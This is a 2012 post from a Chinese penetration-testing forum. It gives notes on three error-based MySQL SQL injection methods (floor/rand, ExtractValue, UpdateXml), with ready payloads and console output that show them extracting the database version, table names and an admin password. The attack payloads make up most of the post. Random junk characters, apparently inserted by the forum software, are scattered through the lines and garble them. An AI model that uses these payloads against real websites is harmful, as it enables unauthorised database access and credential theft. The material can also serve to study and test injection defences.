中国网络渗透测试联盟

标题: 关于Mysql注入过程中的三种报错方式 [打印本页]
作者: admin    时间: 2012-12-10 10:28
标题: 关于Mysql注入过程中的三种报错方式
放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
( q, W4 |4 x2 M实际测试环境:
3 {# Q) d4 h7 `& A1 b' R+ e
) \: P8 @0 |2 q. |4 T2 @6 G 3 X2 L0 }  K- M" L5 B
mysql> show tables;' f1 R  x1 s+ X, V0 ~  m4 b/ j
+----------------+5 X+ J+ R2 U* J& g$ r7 ~9 I' o
| Tables_in_test |
8 A/ q' E! H8 H1 K: ?( ]+----------------+
8 w; w# }" y! C# ^6 b) z3 @  p| admin          |
# l+ y( k" ~- I| article        |
  g9 Y, i$ _0 A. j0 T. C+----------------+
/ @; R+ _$ ~. P9 y # ]5 }* ?* n% y) O$ U

3 _* j. P1 m3 V8 k# R5 ]4 X
5 n, Z2 N" n& z! `mysql> describe admin;
( g& A% L2 s) f1 ?+-------+------------------+------+-----+---------+----------------+" R! X9 F' W6 Q
| Field | Type             | Null | Key | Default | Extra          |1 Y. A) q2 o! p3 J; }) Q5 I
+-------+------------------+------+-----+---------+----------------+
$ G9 M' I  G* m! Z0 c# d| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
3 Q/ w3 s  D; d| user  | varchar(50)      | NO   |     | NULL    |                |
- h$ E# N" C; y; A! r| pass  | varchar(50)      | NO   |     | NULL    |                |  @# A/ a" P# e
+-------+------------------+------+-----+---------+----------------+
8 Q- J! R. J  ^! I
3 Z% U) m2 e/ M$ J$ X" [
5 ~8 e0 I" O8 M$ A3 l" D# Z9 f6 p 3 r+ S5 E* Q/ z- q: }$ k- E" i
mysql> describe article;$ s- P6 z5 p" u" g% X5 L
+---------+------------------+------+-----+---------+----------------+
' ]2 X. {: ]* x| Field   | Type             | Null | Key | Default | Extra          |
1 N2 E+ H" F" ]5 q' W+---------+------------------+------+-----+---------+----------------+1 D# ~2 u9 _- C
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
# L. l* S5 o0 m; }- o) d8 [! G| title   | varchar(50)      | NO   |     | NULL    |                |
9 j3 e; ^. y1 `| content | varchar(50)      | NO   |     | NULL    |                |
2 b# ~: k& Z" L( B+---------+------------------+------+-----+---------+----------------+
/ F& I6 _; t; A$ V* B3 ~" c: _4 y1、通过floor报错
, a" i! Z8 d" q( T; V6 d可以通过如下一些利用代码9 X+ b  C$ r# }

# ^0 e3 t9 \! [; l& y* a5 C1 ~! t ) r+ |2 e+ U1 @  D3 `2 C
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
8 l& L/ i! P, P/ P8 A; x. ~from information_schema.tables group by x)a);
! E- S& p8 u. m! y
3 J2 m- i! p. f; z$ c- }; t, j1 ~$ I $ }# f( n  U! [- ?/ v& Q
and (select count(*) from (select 1 union select null union select !1)x
* g, t0 h: Y- s2 d  a" [group by concat((select table_name from information_schema.tables limit 1),0 R. t; x# t7 L! |( D
floor(rand(0)*2)));
9 c& b. K- k8 _  R2 v举例如下:
! |; [  }& p8 n, x, \, r首先进行正常查询:
: e) ^% t8 q5 z- B( |7 N
0 Y+ h) j. m5 x8 \& H/ Xmysql> select * from article where id = 1;
( t6 N, g4 f- p% l+----+-------+---------+5 L% i9 u7 ?/ n" Y1 P% m
| id | title | content |9 N7 I3 B+ Q& B2 O0 U: n0 c
+----+-------+---------+
) E) K$ B% l/ k" i9 T! j+ p|  1 | test  | do it   |& q1 [$ {. X$ L+ n" P
+----+-------+---------+
0 L- z6 E7 a% `假如id输入存在注入的话,可以通过如下语句进行报错。0 A0 y. s# k, [4 @; w7 `) R  X
2 l" S# s/ M+ q5 a

$ Y2 _  p' z+ a( ^8 o( y/ {  @6 Dmysql> select * from article where id = 1 and (select 1 from- T6 B) r  E, V8 B+ P1 I' a
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
7 V4 Y* ~9 M7 g1 Q) I- _8 H  LERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
) f0 Q2 ~" l6 A0 ^* b* O4 Y可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
1 y8 N. I' K6 S' u例如我们需要查询管理员用户名和密码:& w8 M" ^- ]$ ^2 V2 _% I- [/ h
Method1:" E3 d: E# d5 |* F: {; T
! r$ ]3 I6 j' O2 e4 E

/ x/ a/ T# D! Q' j" H( n1 Wmysql> select * from article where id = 1 and (select 1 from
3 R" Z, \' w& |- I(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x. l7 t* Q# n& m  P; \* y
from information_schema.tables group by x)a);
5 _  l6 g& o* ]$ {  A% t, ]ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
  N% e% F! t; C' t& `9 n6 U- U% UMethod2:
, L, ]" W8 V$ a& Z8 i/ G  `4 [8 C9 [ / h% M6 b. X; `& |4 i- H( T

+ U# o# ~7 H9 G( Xmysql> select * from article where id = 1 and (select count(*), U5 A5 a/ \. T. M" r. F
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),& P7 P! |1 C% [! }4 F$ P
floor(rand(0)*2)));+ @1 G- h% V' W/ z# R  l
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'4 d2 o1 T& M( g5 [
2、ExtractValue
* [  J# \/ n$ n4 |测试语句如下
+ a2 [: g$ E- G% V5 H! h; [$ \# m7 O
( N3 S7 Y7 ]+ ^& A! T6 X" s
1 ]+ g2 q- U, t& f; v) ~$ wand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));' M6 y' g* p- z6 D- F, _. u
实际测试过程0 q# o% k9 L/ d7 z; @  {2 A
" B$ i7 j1 C0 l5 i1 t2 e! R
3 G' z6 E" ^3 C8 h6 h9 C
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
4 _' f0 T  e3 a5 R(select pass from admin limit 1)));--
: N' S; y9 D! AERROR 1105 (HY000): XPATH syntax error: '\admin888'
/ X% x; y! d$ [( [! f9 j1 ]3、UpdateXml
: D1 _1 q' ]1 e5 w测试语句
6 k, H/ s3 d: r7 `9 p , {( c2 z3 W7 z6 v
' s* d: y+ s; l9 `5 n& }
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))& \4 n+ [. Y* x7 Z5 Z/ B
实际测试过程
" x- c# ^, a' r% y( P8 W
1 r; J4 f) C- `. \! Z
6 H/ j0 g/ F/ L# B! [4 gmysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
% Z% w$ U2 v& f9 v  Y4 T, c(select pass from admin limit 1),0x5e24),1));
+ S6 `6 L, ]% t+ ]! u& h1 VERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
: o$ ^5 l* E6 W9 k" JAll, thanks foreign guys.
0 {1 T% K& d0 x$ @ " [0 \7 _3 D6 s  X' p
! j  f1 E" F- P3 @/ V0 g* s




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2